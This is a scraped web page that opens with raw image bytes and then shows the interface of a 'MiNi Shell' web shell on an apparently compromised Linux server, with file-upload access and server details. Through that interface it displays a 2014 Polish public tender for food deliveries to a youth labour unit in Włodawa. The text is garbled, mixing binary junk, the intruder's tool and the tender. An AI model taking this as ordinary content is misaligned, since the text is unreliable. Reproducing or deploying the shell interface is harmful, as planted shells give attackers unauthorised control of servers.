JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140417/132816-N-2014.html

<p class="kh_header"><b>Lublin: Dostawa artykułów żywnościowych do ŚRODOWISKOWEGO HUFCA PRACY WE WŁODAWIE.</b><br>
<b>Numer ogłoszenia: 132816 - 2014; data zamieszczenia: 17.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy Lubelska Wojewódzka Komenda , ul. Wojciechowska 7, 20-704 Lublin, woj. lubelskie, tel. 081 5245108/09 w.13, faks 081 5245108/09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubelska.ohp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: OCHOTNICZE HUFCE PRACY.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do ŚRODOWISKOWEGO HUFCA PRACY WE WŁODAWIE..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.1. Przedmiotem zamówienia jest dostawa artykułów żywnościowych do Środowiskowego Hufca Pracy we Włodawie, mieszczącego się przy ul. Kopernika 1, 22-200 Włodawa.
Oferowane artykuły żywnościowe muszą być dopuszczone do obrotu oraz posiadać dobrą jakość. Produkty te powinny odpowiadać, co do jakości, wymogom wyrobów dopuszczonych do obrotu i stosowania w zbiorowym żywieniu. 
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do SIWZ.
Dostawy będą wykonywane do wyczerpania środków Zamawiającego na ten przedmiot zamówienia.
Zgodnie z art. 29 ust. 3 ustawy Prawo zamówień publicznych Zamawiający w niniejszym postępowaniu dopuszcza składanie ofert równoważnych a wszelkie składniki przedmiotu zamówienia określone za pomocą  nazw producenta, określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać dostarczane artykuły, aby spełniać opisane poniżej wymagania zamówienia.
3.1.2. MIEJSCE DOSTAWY Środowiskowy Hufiec Pracy we Włodawie, ul. Kopernika 1, 22200 Włodawa.
3.1.3. SPOSÓB DOSTAWY dostawy będą następować cyklicznie stosownie do potrzeb Zamawiającego od dnia podpisania umowy do 31 grudnia 2014 roku, po uprzednim telefonicznym ustaleniu, z wyprzedzeniem jednodniowym przez Zamawiającego wielkości 
i terminu dostawy. Wykonawca realizuje zamówienie zgodnie z wymogami Zamawiającego, dzień dostawy zawsze wyznaczany jest przez osobę odpowiedzialną za zamówienia artykułów żywnościowych w jednostce organizacyjne LWK OHP. Wykonawca bezwzględnie musi stosować się do potrzeb i wymogów Zamawiającego.
Osoba odpowiedzialna za dostawy: Mariola Wojtak, tel. 607 849 275, 082 572 56 62..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.30.00.00-1, 15.81.00.00-9, 15.33.41.70-9, 15.22.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części 1
6.1.1.1 wykaz wykonanych głównych dostaw w okresie ostatnich 3 lat przed terminem składania ofert a jeśli okres prowadzenia działalności jest krótszy  w tym okresie minimum 2 dostaw artykułów żywnościowych o wartości równej lub większej niż 30. 000,00 zł brutto każda załącznik nr 5 wraz z załączeniem dowodów, że zostały wykonane należycie
6.1.1.2 dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
 dysponuje sprawnym pod względem technicznym samochodem z działającą prawidłowo zabudową izotermiczną lub chłodnią  oświadczenie wg załącznika nr 2,
dla części 2 i 9
6.1.1.1 wykaz wykonanych głównych dostaw w okresie ostatnich 3 lat przed terminem składania ofert a jeśli okres prowadzenia działalności jest krótszy  w tym okresie minimum 2 dostaw artykułów żywnościowych o wartości równej lub większej niż 30. 000,00 zł brutto każda  załącznik nr 5 wraz z załączeniem dowodów, że zostały wykonane należycie,
dla części 11
6.1.1.1 wykaz wykonanych głównych dostaw w okresie ostatnich 3 lat przed terminem składania ofert a jeśli okres prowadzenia działalności jest krótszy  w tym okresie minimum 2 dostaw artykułów żywnościowych o wartości równej lub większej niż 30. 000,00 zł brutto każda  załącznik nr 5 wraz z załączeniem dowodów, że zostały wykonane należycie,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, z zastrzeżeniem ust. 2
2.     Strony przewidują możliwość wprowadzenia następujących zmian w umowie: 
1 zmiana stawki i kwoty podatku Vat.
2 zmiana terminu realizacji przedmiotu zamówienia, w przypadku:
a działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubelska.ohp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Lublin 20-704, ul. Wojciechowska 7 pok 216.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2014 godzina 10:00, miejsce: Lublin 20-704, ul. Wojciechowska 7 pok 216.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ryby przetworzone i konserwowane,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa, opis produktu	J.m.	Ilość
1.	Kostka mrożona filet z morszczuka  bez lodu 	kg	100
2.	Płaty śledziowe SEKO                             lub równoważny	kg	40
3.	 Śledź w pomidorach 170g GRAL                     lub równoważny	Szt.	150
4.	Śledź  w oleju  170g Super Fisz                    lub równoznaczne 	Szt. 	150
5.	Sałatka pikantna z makreli                    Super Fisz  lub równoważny 	kg	60
6.	Filet mrożony tilapia bez lodu   	kg	100
7.	Filet mrożony panga bez lodu 	kg	              100
8.	Kotlet rybny -burgery                       lub równoważny 	kg	50
9.	Filety śledziowe w oleju  SEKO             lub równoważny	kg	30
10.	Leczo rybne SEKO  (marchew, cebula ,pietruszka, seler, ryba, )                           lub równoważny	kg	20
11.	Śledzie w śmietanie SEKO                     lub równoważny	kg	15
   12.	Paprykarz szczeciński NEPTUN  lub równoważny 	kg	30
   13.	Tuńczyk w oleju roślinnym              Super Fisz  lub równoważny 	kg	5,55
   14.	Tuńczyk w sosie własnym                Super Fisz  lub równoważny 	kg	5,55.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> owoce, warzywa i podobne produkty,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa, opis produktu	J.m.	Ilość
1.	Ogórek kiszony twardy	kg	60
2.	Ogórek małosolny	kg	50
3.	Ogórek szklarniowy 	kg	50
4.	Sałata masłowa                                        	szt.	200
5.	Kapusta kiszona 	kg	400
6.	Jajka klasa A wielkość L                                                                        jakość od  0 do 3	        szt.	            2000
7.	Burak czerwony ćwikłowy 	kg	150
8.	Cebula czerwona 	kg	30
9.	Cebula biała  zwyczajna	kg	200
10.	Fasola biała strączkowa	kg	25
11.	Fasola Jaś	kg	100
12.	Fasola szparagowa żółta 	kg	20
13.	Fasola szparagowa zielona  	kg	20
14.	Brokuł zielony 	kg	30
15.	Groch  łuskany połówki             	kg	40
16.	Czosnek  główka  pospolity	szt.	               60
17.	Kalafior  biały 	szt.	50
18.	Kapusta biała jesienna, zimowa	kg	250
19.	Kapusta biała młoda	szt.	200
20.	Kapusta czerwona 	kg	30
21.	Kapusta pekińska	kg	80
22.	Koperek zielony pęczek szt.	80
23.	Natka pietruszki pęczek	szt.	80
24.	Szczypior (pęczek)	szt.	80
25.	Marchew korzeń 	kg	500
26.	Papryka czerwona	kg	30
27.	Papryka żółta 	kg	30
28.	Pieczarki	kg	70
29.	Pietruszka korzeń 	kg	100
30.	Pomidor klasa I	kg	50
31.	Pomidor klasa II	kg	80
32.	Por  korzeń	kg	30
33.	Rzodkiewka pęczek 	szt.	150
34.	Sałata lodowa	szt.	30
35.	Seler korzeń 	Kg	60
36.	Soczewica  strączkowa 	Kg	30
37.	Ziemniaki jesienne i zimowe irga 	kg	2000
38.	Ziemniak młody irysy                    		500
39.	Brzoskwinia	kg	40
40.	Pomarańcze	kg	40
41.	Truskawka 	kg	50
42.	Grapefruit czerwony 	kg	20
43.	Kiwi	kg	20
44.	Jabłka Champion	kg	50
45.	Jabłka Jonagold 	kg	50
46.	Jabłka Gloster 	kg	80
47.	Jabłko Lobo 	kg	80
48.	Mandarynka bezpestkowa 	kg	50
49.	Śliwka węgierka 	kg	30
50.	Winogron biały	kg	               30
51.	Winogron ciemny	kg	30
52.	Banany 	kg	40
53.	Cytryna	kg	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> pieczywo, świeże wyroby piekarskie i ciastkarskie,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa, opis przedmiotu	J.m.	Ilość
    1.	Bułka kajzerka 50 g	szt.	             5000
2.	Bułka  pszenna   60g	szt.	             5000
3.	Bułka wrocławska 350g                        	szt.	              50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> produkty mrożone..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa, opis produktu	J.m.	Ilość
1.	Brokuł zielony  Hortex                      lub równoważny	kg	10
2.	Brukselka Hortex                                             lub równoważny             	kg	10
3.	Fasolka szparagowa zielona  Hortex lub równoważny	kg	25
4.	Fasolka szparagowa żółta Hortex               lub równoważny	kg	20
4.	Groszek zielony Hortex                         lub równoznaczny 	         kg	               10
5.	Kalafior Hortex                                          lub równoważny	kg	50
6.	Marchew kostka Zavinex                          lub równoważny	kg	100
7.	Marchew z groszkiem Hortex                lub równoważny 	kg	50
9.	Mieszanka warzyw(marchew, pietruszka. seler, por  Hortex                            lub równoważny	kg	40
10.	Mieszanka królewska marchew, kalafior, fasolka, brukselka, por Agram  lub równoważna 	kg	40
11.	Barszcz ukraiński Hortex                         lub  równoważny 	kg	30
12.	Zupa babuni Hortex                               lub równoważny 	kg	30
13.	Zupa grzybowa z podgrzybkami Hortex lub równoważny 	kg	30
14.	Zupa fasolowa Hortex                          lub równoważny 	kg	20
15.	Zupa pieczarkowa Hortex                      lub równoważna 	kg	               30
16.	Zupa ogórkowa Hortex                lub równoważna 	kg	20
17.	Zupa jarzynowa Hortex                lub równoważny	kg	30
18.	Śliwka drylowana mrożona  Hortex lub równoważny 	kg	30
19.	Truskawka mrożona  Hortex      Zavinx    lub równoważny 	kg	120
20.	Mieszanka owoców mrożonych wiśnia ,truskawka, porzeczka, aronia Hortex  lub równoważny 	kg	50
21.	Mieszanka kompotowa   Agram          lub równoważna 	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com